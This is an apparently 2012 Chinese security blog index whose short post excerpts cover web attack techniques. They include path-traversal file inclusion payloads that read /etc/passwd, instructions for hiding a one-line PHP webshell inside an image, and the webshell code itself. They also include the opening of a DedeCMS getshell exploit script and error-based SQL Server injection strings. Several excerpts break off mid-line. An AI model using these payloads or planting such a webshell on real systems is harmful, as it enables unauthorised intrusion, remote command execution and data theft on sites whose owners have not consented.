文件包含与注入利用总结
2012-1-21 0:49:50 阅读7 评论0 212012/01 Jan21
1、文件包含利用
通过传递本地或者远程的文件(allow_url_fopen开启)作为参数进行利用,可以读取敏感信息、执行命令、GetWebshell.
Type of call:
require($file);
Exploit:
http://www.2cto.com/ ?file=/etc/passwd
Type of call:
require(“includes/”.$file);
Exploit:
http://www.2cto.com/ ?file=../../../../../etc/passwd
Tpye of calls:
require(“languages/”.$lang.”.php”);
require(“themes/”.$theme.”/config.php”);
IIS7.0畸形解析0day
2012-1-20 16:03:03 阅读12 评论0 202012/01 Jan20
①、DOS合并:copy 1.gif /b + 1.txt/a asp.gif
②、用edjpgcom,进行图片和一句话木马的合并,
图片随便找一张.
【顺带着说一下edjpgcom的使用方法:打开edjpgcom.exe所在文件夹,然后把你所要修改的图片拖动到
edjpgcom.exe上面,然后edjpgcom.exe会自动打开,写入想要些的代码即可】
一句话:
<?PHP fputs(fopen(’shell.php’,’w’),’<?php eval($_POST[cmd])?>’);?>
然后找个nginx的站,先注册一个用户然后在
【转】DeDeCMS(织梦)变量覆盖0day getshell
2012-1-10 14:42:36 阅读17 评论0 102012/01 Jan10
| #!usr/bin/php -w <?php error_reporting(E_ERROR); set_time_limit(0); print_r(′ DEDEcms Variable Coverage Exploit Author: www.heixiaozi.com www.webvul.com ); echo "\r\n"; if($argv[2]==null){ print_r(′ +---------------------------------------------------------------------------+ Usage: php ′.$argv[0].′ url aid path aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/ |
【转】Apache Struts远程命令执行和任意文件覆盖漏洞
2012-1-10 14:42:08 阅读8 评论0 102012/01 Jan10
Sql Server 手工注入总结(显错模式)
2012-1-6 9:49:16 阅读14 评论0 62012/01 Jan6
--显错模式总结,利用类型转换报错。 --1=convert(int,(@@version)) --1=convert(int